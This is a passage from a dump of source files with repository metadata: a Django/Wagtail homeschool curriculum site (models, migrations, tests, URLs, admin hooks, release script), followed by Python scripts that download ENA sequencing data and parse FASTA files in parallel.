"avg_line_length": 25.45833396911621,
"blob_id": "e197fcb1063b38013335a63b2b69f85dad23e0af",
"content_id": "6cd0b9b3c712b475ee6af8d29477fe1c64794fb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5080,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 192,
"path": "/fphs/curriculums/models.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.conf import settings\nfrom django.db import models\nfrom django.forms import ModelForm, TextInput, Textarea, Select\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\nimport uuid\n\n\nclass Category(models.Model):\n class Meta:\n verbose_name = \"Category\"\n verbose_name_plural = \"Categories\"\n\n name = models.CharField(max_length=50)\n\n def __str__(self):\n return self.name\n\n\nclass Subject(models.Model):\n name = models.CharField(max_length=50)\n category = models.ForeignKey(\n Category,\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name=\"subjects\",\n )\n\n def __str__(self):\n return self.name\n\n\nclass Grade(models.Model):\n name = models.CharField(max_length=20)\n\n def __str__(self):\n return self.name\n\n\nclass Age(models.Model):\n name = models.CharField(max_length=3)\n\n def __str__(self):\n return self.name\n\n\nclass ReligiousPreference(models.Model):\n name = models.CharField(max_length=30)\n\n def __str__(self):\n return self.name\n\n\nclass Publisher(models.Model):\n name = models.CharField(max_length=100)\n link = models.URLField(max_length=200)\n\n def __str__(self):\n return self.name\n\n\nclass Sort:\n class Labels(models.IntegerChoices):\n NEWEST = (\n 1,\n _(\"Newest\"),\n )\n OLDEST = (\n 2,\n _(\"Oldest\"),\n )\n HIGHEST_RATING = (\n 3,\n _(\"Highest Rating\"),\n )\n LOWEST_RATING = (\n 4,\n _(\"Lowest Rating\"),\n )\n NAME = (\n 5,\n _(\"A-Z\"),\n )\n NAME_REVERSED = 6, _(\"Z-A\")\n\n class Values(models.IntegerChoices):\n NEWEST = (\n 1,\n \"-created\",\n )\n OLDEST = (\n 2,\n \"created\",\n )\n HIGHEST_RATING = (\n 3,\n \"-avg_rating\",\n )\n LOWEST_RATING = (\n 4,\n \"avg_rating\",\n )\n NAME = (\n 5,\n \"name\",\n )\n NAME_REVERSED = 6, \"-name\"\n\n\nclass Curriculum(models.Model):\n name = models.CharField(max_length=200)\n description = models.TextField(max_length=2000)\n slug = models.SlugField(max_length=200, unique=True)\n link = models.URLField(max_length=200)\n image = models.ForeignKey(\n \"wagtailimages.Image\", null=True, blank=True, on_delete=models.SET_NULL\n )\n is_confirmed = models.BooleanField(default=False)\n subjects = models.ManyToManyField(Subject, related_name=\"curriculums\")\n grades = models.ManyToManyField(Grade, related_name=\"curriculums\")\n ages = models.ManyToManyField(Age, related_name=\"curriculums\")\n religious_preference = models.ForeignKey(\n ReligiousPreference,\n null=True,\n on_delete=models.SET_NULL,\n related_name=\"curriculums\",\n )\n publisher = models.ForeignKey(\n Publisher, on_delete=models.CASCADE, related_name=\"curriculums\"\n )\n created_by = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n null=True,\n on_delete=models.SET_NULL,\n related_name=\"curriculums\",\n )\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse(\"curriculums:detail\", kwargs={\"slug\": self.slug})\n\n\nclass CurriculumForm(ModelForm):\n class Meta:\n model = Curriculum\n fields = [\"name\", \"description\", \"link\", \"publisher\"]\n widgets = {\n \"name\": TextInput(attrs={\"class\": \"form-control\"}),\n \"description\": Textarea(attrs={\"class\": \"form-control\"}),\n \"link\": TextInput(attrs={\"class\": \"form-control\"}),\n \"publisher\": Select(attrs={\"class\": \"form-control\"}),\n }\n\n\nclass Review(models.Model):\n RATING_CHOICES = ((1, \"1\"), (2, \"2\"), (3, \"3\"), (4, \"4\"), (5, \"5\"))\n uuid = 
models.UUIDField(default=uuid.uuid4, unique=True, editable=False)\n curriculum = models.ForeignKey(\n Curriculum, on_delete=models.CASCADE, related_name=\"reviews\"\n )\n content = models.TextField(max_length=5000, blank=True)\n rating = models.IntegerField(choices=RATING_CHOICES)\n verified = models.BooleanField(default=False)\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name=\"reviews\"\n )\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n class Meta:\n ordering = [\"-updated\"]\n\n def __str__(self):\n return f\"{self.curriculum} - {self.rating} - {self.user.email}\"\n\n\nclass ReviewForm(ModelForm):\n class Meta:\n model = Review\n fields = [\"content\", \"rating\"]\n labels = {\n \"content\": _(\"Review\"),\n }\n widgets = {\n \"content\": Textarea(attrs={\"class\": \"form-control\"}),\n \"rating\": Select(attrs={\"class\": \"form-control\"}),\n }\n"
},
{
"alpha_fraction": 0.5423387289047241,
"alphanum_fraction": 0.6129032373428345,
"avg_line_length": 25.105262756347656,
"blob_id": "acb334c827eba27639d2899256d6ed6f335c6d8e",
"content_id": "67f14ac798d170e051da5bafc5cfe810170b0ef8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 496,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 19,
"path": "/fphs/users/migrations/0003_user_favorite_curriculums.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.5 on 2020-07-27 16:16\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('curriculums', '0011_auto_20200529_0234'),\n ('users', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='user',\n name='favorite_curriculums',\n field=models.ManyToManyField(blank=True, related_name='favorited_by', to='curriculums.Curriculum'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6836638450622559,
"alphanum_fraction": 0.6836638450622559,
"avg_line_length": 28.41666603088379,
"blob_id": "f345db0cb329a27bb097b08962c1482e31e626c3",
"content_id": "8d5de0c1590abec9b1cd1fb5635aa8bb0b58e1c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1059,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 36,
"path": "/fphs/curriculums/tests/test_utils.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth import get_user_model\n\nfrom fphs.curriculums.models import (\n Category,\n Subject,\n Grade,\n Age,\n ReligiousPreference,\n Publisher,\n Curriculum,\n)\n\n\ndef create_curriculum(name):\n category = Category.objects.create(name=name)\n subject = Subject.objects.create(name=name, category=category)\n grade = Grade.objects.create(name=name)\n age = Age.objects.create(name=name)\n religious_preference = ReligiousPreference.objects.create(name=name)\n publisher = Publisher.objects.create(name=name)\n user = get_user_model().objects.create_user(\n email=\"[email protected]\", username=f\"username{name}\", password=f\"password{name}\"\n )\n user.save()\n curriculum = Curriculum.objects.create(\n name=name,\n description=\"description\",\n link=\"http://localhost\",\n religious_preference=religious_preference,\n publisher=publisher,\n created_by=user,\n )\n curriculum.subjects.add(subject)\n curriculum.grades.add(grade)\n curriculum.ages.add(age)\n return curriculum\n"
},
{
"alpha_fraction": 0.5981981754302979,
"alphanum_fraction": 0.6396396160125732,
"avg_line_length": 28.210525512695312,
"blob_id": "681bbd7068754f25f512b3b05157ab18b93cf2b9",
"content_id": "4acff26f2b5760ab75da83fc4330fa5876f93061",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 555,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 19,
"path": "/fphs/users/migrations/0008_user_favorite_curriculums.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.5 on 2020-07-30 23:47\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('curriculums', '0012_curriculum_image'),\n ('users', '0007_remove_user_favorite_curriculums'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='user',\n name='favorite_curriculums',\n field=models.ManyToManyField(blank=True, related_name='favorited_by', through='users.FavoriteCurriculum', to='curriculums.Curriculum'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6129032373428345,
"alphanum_fraction": 0.6244239807128906,
"avg_line_length": 28.931034088134766,
"blob_id": "1590b0aad6e371280b739e287ceb1e2531af455c",
"content_id": "709679140347c5abc9a2aa5ffb5c72f01fd85c05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 868,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 29,
"path": "/fphs/curriculums/migrations/0013_curriculum_slug.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.db import migrations, models\nfrom django.utils.text import slugify\n\ndef generate_slug(apps, schema_editor):\n Curriculum = apps.get_model(\"curriculums\", \"Curriculum\")\n for curriculum in Curriculum.objects.all():\n curriculum.slug = slugify(curriculum.name)\n curriculum.save(update_fields=[\"slug\"])\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0012_curriculum_image\"),\n ]\n\n operations = [\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"slug\",\n field=models.SlugField(max_length=200, db_index=False, null=True),\n ),\n migrations.RunPython(generate_slug),\n migrations.AlterField(\n model_name=\"curriculum\",\n name=\"slug\",\n field=models.SlugField(max_length=200, unique=True),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6960926055908203,
"alphanum_fraction": 0.6960926055908203,
"avg_line_length": 33.54999923706055,
"blob_id": "12b095a097dd25f81e146eeb45494491c3cbdd64",
"content_id": "d998b92291c926314a713bd648e6f2bffde4dee6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 691,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 20,
"path": "/fphs/users/urls.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.urls import path\n\nfrom fphs.users.views import (\n UserRedirectView,\n UserFavoritesView,\n UserProfileEditView,\n UserPrivacyView,\n UserProfileView,\n UserReviewsListView,\n)\n\napp_name = \"users\"\nurlpatterns = [\n path(\"~redirect/\", view=UserRedirectView.as_view(), name=\"redirect\"),\n path(\"favorites/\", UserFavoritesView.as_view(), name=\"favorites\"),\n path(\"profile/edit/\", UserProfileEditView.as_view(), name=\"profile-edit\"),\n path(\"privacy/\", UserPrivacyView.as_view(), name=\"privacy\"),\n path(\"<str:username>/profile/\", UserProfileView.as_view(), name=\"profile\"),\n path(\"<str:username>/reviews/\", UserReviewsListView.as_view(), name=\"reviews\"),\n]\n"
},
{
"alpha_fraction": 0.7424242496490479,
"alphanum_fraction": 0.7424242496490479,
"avg_line_length": 17,
"blob_id": "e155e2f22a25ca42bc406f01fb56e0e9c0ab02c4",
"content_id": "5d28ea04837968613a39e7ede7941a187707c6b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 198,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 11,
"path": "/compose/production/django/release",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nset -o errexit\nset -o pipefail\nset -o nounset\n\necho 'Collecting static files...'\npython manage.py collectstatic --noinput --clear\n\necho 'Running migrations...'\npython manage.py migrate\n"
},
{
"alpha_fraction": 0.5905362963676453,
"alphanum_fraction": 0.5905362963676453,
"avg_line_length": 15.861701965332031,
"blob_id": "852df3d5a7d0df3a7039bdb40cb9c4f896bdf6aa",
"content_id": "e0d040f9d5ab4ad9d1043cce2dbfd302a932a141",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1585,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 94,
"path": "/fphs/curriculums/wagtail_hooks.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from wagtail.contrib.modeladmin.options import (\n ModelAdmin,\n ModelAdminGroup,\n modeladmin_register,\n)\n\nfrom .models import (\n Curriculum,\n Category,\n Subject,\n Grade,\n Age,\n ReligiousPreference,\n Publisher,\n Review,\n)\n\n\nclass CategoryAdmin(ModelAdmin):\n model = Category\n\n\nclass SubjectAdmin(ModelAdmin):\n model = Subject\n\n\nclass GradeAdmin(ModelAdmin):\n model = Grade\n\n\nclass AgeAdmin(ModelAdmin):\n model = Age\n\n\nclass ReligiousPreferenceAdmin(ModelAdmin):\n model = ReligiousPreference\n\n\nclass PublisherAdmin(ModelAdmin):\n model = Publisher\n list_display = (\n \"name\",\n \"link\",\n )\n search_fields = (\"name\",)\n\n\nclass CurriculumAdmin(ModelAdmin):\n model = Curriculum\n list_display = (\n \"name\",\n \"is_confirmed\",\n \"created_by\",\n )\n list_filter = (\n \"is_confirmed\",\n \"subjects__category\",\n \"subjects\",\n \"grades\",\n \"ages\",\n )\n search_fields = (\n \"name\",\n \"created_by__username\",\n )\n\n\nclass ReviewAdmin(ModelAdmin):\n model = Review\n list_display = (\n \"content\",\n \"rating\",\n \"verified\",\n \"user\",\n )\n list_filter = (\"verified\",)\n search_fields = (\"user__username\",)\n\n\nclass HomeschoolGroup(ModelAdminGroup):\n menu_label = \"Homeschool\"\n items = (\n CategoryAdmin,\n SubjectAdmin,\n GradeAdmin,\n AgeAdmin,\n ReligiousPreferenceAdmin,\n PublisherAdmin,\n CurriculumAdmin,\n ReviewAdmin,\n )\n\n\nmodeladmin_register(HomeschoolGroup)\n"
}
] | 49 |
monorainny/diablo_webservice | https://github.com/monorainny/diablo_webservice | 141447cf9cff7eb4b62b87a07e247537812e60ba | d5fa2e07e7274677bb627b966b7e1c34a4931cad | 0cc39e7d8f98bfa3ba8138c9b966d60961a655ae | refs/heads/master | 2020-05-17T01:50:35.295501 | 2015-10-02T07:24:15 | 2015-10-02T07:24:15 | 21,782,883 | 0 | 0 | null | null | null | null |
[
{
"alpha_fraction": 0.6282690167427063,
"alphanum_fraction": 0.6400996446609497,
"avg_line_length": 23.34848403930664,
"blob_id": "4f5e4215645e1ae280fb0362939ec146e9e43bb5",
"content_id": "6f47f54a47b6f5ca2c245885af490c0177332e35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1606,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 66,
"path": "/src/DiabloProfile.py",
"repo_name": "monorainny/diablo_webservice",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, url_for, json, request\nimport urllib2\n\nurl = 'http://www.acme.com/products/3322'\nhost = 'http://kr.battle.net'\n\napp = Flask(__name__)\n\n'''\nconnection = pymongo.Connection('localhost', 27017)\ntodos = connection['demo']['todos']\n\ndef json_load(data):\n #return json.loads(data, object_hook=json_util.object_hook)\n\ndef json_dump(data):\n return json.dumps(data, default=json_util.default)\n'''\n\[email protected]('/')\ndef hello_world():\n return render_template('diablo3.html')\n\[email protected]('/user/<string:id>')\ndef search_user(id):\n profileApi = '/api/d3/profile/'\n battleTag = id.replace('#', '-')\n \n servieUrl = host + profileApi + battleTag + \"/\"\n response = urllib2.urlopen(servieUrl).read()\n \n return response\n #return json_dump(list(todos.find()))\n\[email protected]('/hero/<string:id>')\ndef search_hero(id):\n profileApi = '/api/d3/profile/'\n battleTag = id.replace('#', '-')\n battleTag = battleTag.replace('@', '/')\n \n servieUrl = host + profileApi + battleTag\n response = urllib2.urlopen(servieUrl).read()\n \n return response\n\n'''\[email protected]('/todos', methods=['POST'])\ndef new_todo():\n todo = json_load(request.data)\n todos.save(todo)\n return json_dump(todo)\n\[email protected]('/todos/<todo_id>', methods=['PUT'])\ndef update_todo(todo_id):\n todo = json_load(request.data)\n todos.save(todo)\n return json_dump(todo)\n\[email protected]('/todos/<todo_id>', methods=['DELETE'])\ndef delete_todo(todo_id):\n todos.remove(ObjectId(todo_id))\n return \"\"\n'''\n\nif __name__ == '__main__':\n app.run(debug=True,port=8080)"
},
{
"alpha_fraction": 0.5301339030265808,
"alphanum_fraction": 0.531622052192688,
"avg_line_length": 20.861787796020508,
"blob_id": "65cca3bd338478e5ddcff1a3d4d6a1177de3f7a8",
"content_id": "a51f98e5ee7a50c0040942ca3ab8bd6256d9fa95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2688,
"license_type": "no_license",
"max_line_length": 178,
"num_lines": 123,
"path": "/src/static/diablo3.js",
"repo_name": "monorainny/diablo_webservice",
"src_encoding": "UTF-8",
"text": "$(function() {\n\twindow.Hero = Backbone.Model.extend({\n\t\turlRoot: '/hero'\n\t});\n\t\n\twindow.User = Backbone.Model.extend({\n\t\turlRoot: '/user'\n\t});\n\t\n\twindow.HeroView = Backbone.View.extend({\n\t\tel: $(\".hero-view\"),\n\t\t\n\t\trender: function () {\n\t\t\tvar that = this;\n\t\t\tthat.hero = new Hero({id: this.model});\n\n\t\t\tthat.hero.fetch({\n\t\t\t\tsuccess: function(heros) {\n\t\t\t\t\tvar attr = heros.attributes;\n\t\t\t\t\t\n\t\t\t\t\tvar stats = attr.stats;\n\t\t\t\t\tvar skills = attr.skills;\n\t\t\t\t\tvar items = attr.items;\n\t\t\t\t\tvar followers = attr.followers;\n\t\t\t\t\t\n\t\t\t\t\t//console.log(stats);\n\t\t\t\t\t//console.log(items);\n\t\t\t\t\tconsole.log(skills);\n\t\t\t\t\t//console.log(followers);\n\t\t\t\t\t\n\t\t\t\t\tvar template = _.template($('#hero-template').html(), {hero: attr});\n\t\t\t\t\t\n\t\t\t\t\t$(\"#hero-view\").html(template);\n\t\t\t\t},\n\t\t\t\terror: function() {\n\t\t\t\t\t$(\"#hero-view\").html(\"\");\n\t\t\t\t\t\n\t\t\t\t\tconsole.log(\"fetch failed\");\n\t\t\t\t}\n\t\t\t})\n\t\t},\n\t});\n\t\n\twindow.HeroListView = Backbone.View.extend({\n\t\tel: $(\"#diablo3app\"),\n\t\t\n\t\trender: function () {\n\t\t\tvar that = this;\n\t\t\tthat.user = new User({id: this.model});\n\n\t\t\tthat.user.fetch({\n\t\t\t\tsuccess: function(userId) {\n\t\t\t\t\tvar attr = userId.attributes;\n\t\t\t\t\t\n\t\t\t\t\tvar errorCode = attr.code;\n\t\t\t\t\t\n\t\t\t\t\tif (errorCode == null)\n\t\t\t\t\t{\n\t\t\t\t\t\tvar battleTag = attr.battleTag;\n\t\t\t\t\t\tvar paragonLevel = attr.paragonLevel;\n\t\t\t\t\t\tvar heroes = attr.heroes;\n\t\t\t\t\t\t\n\t\t\t\t\t\tvar contents = '';\n\t\t\t\t\t\t\n\t\t\t\t\t\t$.each(heroes, function(index, value) { \n\t\t\t\t\t\t\tcontents += \"<li><button type='button' class='btn btn-danger show' id='\" + value.id + \"'>\" + value.name + \"(\" + value.class + \")\" + \" - \" + value.level + \"</button></li>\";\n\t\t\t\t\t\t});\n\t\t\t\t\t\t\n\t\t\t\t\t\t$(\"#hero-list\").html(contents);\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tconsole.log(errorCode);\n\t\t\t\t\t\tconsole.log(attr.reason);\n\t\t\t\t\t\t\n\t\t\t\t\t\t$(\"#hero-list\").html(\"\");\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\t$(\"#hero-view\").html(\"\");\n\t\t\t\t},\n\t\t\t\terror: function() {\n\t\t\t\t\t$(\"#hero-list\").html(\"\");\n\t\t\t\t\t$(\"#hero-view\").html(\"\");\n\t\t\t\t\t\n\t\t\t\t\tconsole.log(\"fetch failed\");\n\t\t\t\t}\n\t\t\t})\n\t\t},\n\t\tevents: {\n\t\t\t'click .show': 'findHero'\n\t\t},\n\t\tfindHero: function (ev) {\n\t\t\tvar heroId = $(ev.currentTarget).attr(\"id\");\n\t\t\tvar searchId = this.model + \"@hero@\" + heroId;\n\t\t\t\n\t\t\tvar hereview = new HeroView({model: searchId});\n\t\t\thereview.render();\n\t \t\n\t\t\treturn false;\n\t\t}\n\t});\n\t\n\twindow.user = new User;\n\t\n\twindow.AppView = Backbone.View.extend({\n\t el: $(\"#diablo3app\"),\n\t \n\t events: {\n\t \t\"keypress #search-hero\": \"createOnEnter\"\n\t },\n\t \n\t createOnEnter: function(e) {\n\t \tif (e.keyCode != 13) return;\n\t \t\n\t \tvar inputValue = $(\"#search-hero\").val();\n\t \t\n\t \tvar listview = new HeroListView({model: inputValue});\n\t \tlistview.render();\n\t }\n\t});\n\n\twindow.App = new AppView;\n});"
}
] | 2 |
xescape/scripts | https://github.com/xescape/scripts | 87e3651646cf937ef2302c4d781b253be49b0d2e | e178b31dcb28e4d81817c69638abe1b2f45ac2b9 | 453a495770edbbc912aefdb60d5189ce735da367 | refs/heads/master | 2020-04-14T07:01:53.403414 | 2019-07-09T18:55:03 | 2019-07-09T18:55:03 | 163,701,842 | 0 | 0 | null | null | null | null |
[
{
"alpha_fraction": 0.6004915237426758,
"alphanum_fraction": 0.6078645586967468,
"avg_line_length": 25.693429946899414,
"blob_id": "ee63670bc73abf4a3bea4d9a0cd9de76c521854e",
"content_id": "26860a1cee4a77ce982266ab56b462ca8aeca9ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3662,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 137,
"path": "/misc/easyENADownloader.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jan. 2, 2019\nSomehow it seems like our job was easier than expected?\n\n@author: Javi\n'''\n\nimport sys\nimport subprocess as sub\nfrom pathlib import Path\nfrom shutil import rmtree\nfrom multiprocessing import Pool\nimport os\nimport logging\nimport re\n\ndef worker(downloader_path, output_path, acc):\n '''\n process one sample. we're going to assume it's just one acc.\n it's actually impractical to do more than 1.\n '''\n tmp_path = output_path / str(os.getpid())\n os.mkdir(tmp_path)\n \n # print('downloading ' + str(acc))\n logger = logging.getLogger()\n sub.run([downloader_path, '-f', 'fastq', '-d', tmp_path, acc])\n\n os.rename(tmp_path / acc, output_path / acc)\n os.removedirs(tmp_path)\n\n logger.info(acc)\n\n\n\ndef checkForCompletion(accs, log_path, out_path):\n '''\n checks if this acc is in the log. Return true if not there.\n '''\n with open(log_path) as input:\n log_text = input.read()\n\n res = []\n for acc in accs:\n if acc not in log_text or not verify(acc, out_path):\n t = out_path / acc\n if t.is_dir(): \n # i = input(\"Delete partial directory {0}? Y/N\")\n # if i.upper() == 'Y':\n # rmtree(t)\n print('Partial directory found for {0}, moving.'.format(acc))\n t.rename(str(t)+'.old')\n res.append(acc)\n \n \n return res\n\ndef verify(acc, out_path):\n suf_1 = '{0}_1.fastq.gz'\n suf_2 = '{0}_2.fastq.gz'\n\n p1 = out_path / acc / suf_1.format(acc)\n p2 = out_path / acc / suf_2.format(acc)\n\n if p1.is_file() and p2.is_file():\n return True\n else:\n return False\n\ndef loadTable(input_path):\n '''\n We just have a nice txt file with a column full of SRR- accs\n '''\n \n with open(input_path) as input:\n d = input.read()\n \n return d.rstrip('\\n').split('\\n')\n\ndef configLogger(path):\n \n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n \n fh = logging.FileHandler(path)\n fh.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s: \\n %(message)s \\n')\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n \n sh = logging.StreamHandler()\n sh.setFormatter(formatter)\n sh.setLevel(logging.INFO)\n logger.addHandler(sh)\n\n\ndef run(downloader_path, input_path, output_path):\n \n log_path = output_path / 'log.txt'\n configLogger(log_path)\n accs = checkForCompletion(loadTable(input_path), log_path, output_path)\n \n\n print(accs)\n with Pool(processes=4) as pool:\n pool.starmap(worker, [(downloader_path, output_path, acc) for acc in accs])\n \n logger = logging.getLogger()\n logger.info('completed')\n \n \n \n \nif __name__ == '__main__':\n \n# downloader_path = '/d/data/plasmo/enaBrowserTools/python3/enaDataGet'\n# input_path = '/d/data/plasmo/additional_data/test_accs.txt'\n# output_path = '/d/data/plasmo/additional_data'\n\n downloader_path = Path('/d/data/plasmo/enaBrowserTools/python3/enaDataGet')\n input_path = Path('/d/data/plasmo/new_accs.txt')\n output_path = Path('/home/javi/seq')\n\n\n # downloader_path = '/home/j/jparkin/xescape/programs/enaBrowserTools/python3/enaDataGet'\n # input_path = sys.argv[1]\n # output_path = sys.argv[2]\n \n run(downloader_path, input_path, output_path)\n\n\n # #verify only\n # log_path = output_path / 'log.txt'\n # accs = loadTable(input_path)\n # incomplete = [x for x in accs if not verify(x, output_path)]\n # print('incomplete stuff: {0}'.format(str(incomplete)))\n print('ENADownloader Complete.')\n "
},
{
"alpha_fraction": 0.5598171353340149,
"alphanum_fraction": 0.5732791423797607,
"avg_line_length": 31.127119064331055,
"blob_id": "9c2bdf3e18e72a61d41e127defbd32b50b1ee516",
"content_id": "12806f41d17d64655f8a271c1e1d9312d888d357",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3937,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 118,
"path": "/misc/parsefasta.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "import pandas\r\nimport numpy\r\nimport re\r\nimport multiprocessing as mp\r\nimport timeit\r\nimport os\r\nimport re\r\nimport logging\r\nfrom functools import reduce\r\nfrom collections import deque\r\n\r\ndef read(path):\r\n\r\n with open(path, 'r') as input:\r\n return input.read()\r\n\r\ndef main(path):\r\n configLogger()\r\n logger = logging.getLogger()\r\n logger.info('start')\r\n global main_data\r\n main_data = read(path)\r\n global main_data_length\r\n main_data_length = len(main_data)\r\n\r\n size = main_data_length // mp.cpu_count()\r\n chunks = list(range(0, main_data_length, size))\r\n chunks[-1] = main_data_length\r\n\r\n logger.info('starting map. we have {0} chunks.'.format(len(chunks)-1))\r\n\r\n with mp.Manager() as manager:\r\n res_lists = [manager.list() for i in range(1, len((chunks)))]\r\n\r\n with manager.Pool(processes = mp.cpu_count()) as pool:\r\n pool.starmap(worker, [(l, chunks[i-1], chunks[i], i) for i, l in zip(range(1,len(chunks)), res_lists)])\r\n logger.info('done map')\r\n # final = deque()\r\n # for q in res_lists:\r\n # # print(len(q))\r\n # final.extend(q)\r\n # logger.info('{0} reads processed'.format(len(list(final))))\r\n # print(len(final))\r\n # print(list(res.items())[-1])\r\n\r\n\r\ndef worker(res_list, upper_bound, lower_bound, i):\r\n def oneRead(read_tup):\r\n return read_tup[0], \"\".join(read_tup[1].rstrip('\\n').split('\\n'))\r\n\r\n logger = logging.getLogger()\r\n logger.info('{0} starting chunk {1}'.format(os.getpid(), i))\r\n\r\n header = '>'\r\n pattern = re.compile('(?s)>(.+?)\\n(.+?)(?=\\n>|$)')\r\n section = main_data[upper_bound:lower_bound]\r\n logger.info('{0} starting'.format(os.getpid()))\r\n reads = re.findall(pattern, section)\r\n\r\n logger.info('{0} processing'.format(os.getpid()))\r\n res = [oneRead(read) for read in reads]\r\n\r\n logger.info('{0} lookahead'.format(os.getpid()))\r\n #do the last one\r\n if len(res) >= 1:\r\n lookahead_list = [min(lower_bound + 1000, main_data_length), min(lower_bound + 10000, main_data_length), min(lower_bound + 100000, main_data_length), main_data_length]\r\n last_pattern = re.compile('(?s)>({0})\\n(.+?)(?=\\n>)'.format(re.escape(res[-1][0])))\r\n\r\n\r\n for l in lookahead_list:\r\n section = main_data[upper_bound:l]\r\n last_read = re.search(last_pattern, section)\r\n if last_read:\r\n res[-1] = oneRead((last_read.group(1), last_read.group(2)))\r\n break\r\n\r\n if not last_read:\r\n final_pattern = re.compile('(?s)>({0})\\n(.+?)(?=\\n$)'.format(re.escape(res[-1][0])))\r\n final_read = re.search(final_pattern, main_data[upper_bound:main_data_length])\r\n try:\r\n res[-1] = oneRead((final_read.group(1), final_read.group(2)))\r\n except AttributeError:\r\n logger.info('ATTRIBUTE ERROR by {0} in chunk {1}'.format(os.getpid(), i))\r\n\r\n logger.info('{0} returning'.format(os.getpid()))\r\n # d.update(dict(res))\r\n logger.info('{0} found {1} reads'.format(os.getpid(), len(res)))\r\n res_list.extend(res)\r\n logger.info('{0} FINISHING chunk {1}'.format(os.getpid(), i))\r\n\r\n\r\ndef configLogger():\r\n \r\n logger = logging.getLogger()\r\n logger.setLevel(logging.INFO)\r\n \r\n formatter = logging.Formatter('%(asctime)s:\\n%(message)s\\n')\r\n \r\n sh = logging.StreamHandler()\r\n sh.setLevel(logging.INFO)\r\n sh.setFormatter(formatter)\r\n logger.addHandler(sh)\r\n \r\n return logger\r\n\r\nif __name__ == \"__main__\":\r\n import cProfile\r\n import sys\r\n\r\n loc = sys.argv[1]\r\n\r\n if loc == 'local':\r\n path = '/d/data/sp/test.fasta'\r\n else:\r\n path = 
'/gpfs/fs0/project/j/jparkin/Lab_Databases/ChocoPhlAn/ChocoPhlAn.fasta'\r\n # path = '/scratch/j/jparkin/xescape/test_big.fasta'\r\n cProfile.run('main(path)', sort='cumtime')\r\n # main(path)\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
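A quick sanity check of the record regex that worker() above depends on; the toy reads are invented, only the pattern comes from the script:

```python
# Minimal sketch: the FASTA record pattern used in worker() above,
# applied to an invented two-read string.
import re

pattern = re.compile(r'(?s)>(.+?)\n(.+?)(?=\n>|$)')
fasta = ">read1\nACGT\nACGT\n>read2\nTTTT"

for header, seq in pattern.findall(fasta):
    # oneRead() joins wrapped sequence lines the same way
    print(header, "".join(seq.rstrip('\n').split('\n')))
# read1 ACGTACGT
# read2 TTTT
```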
{
"alpha_fraction": 0.4712389409542084,
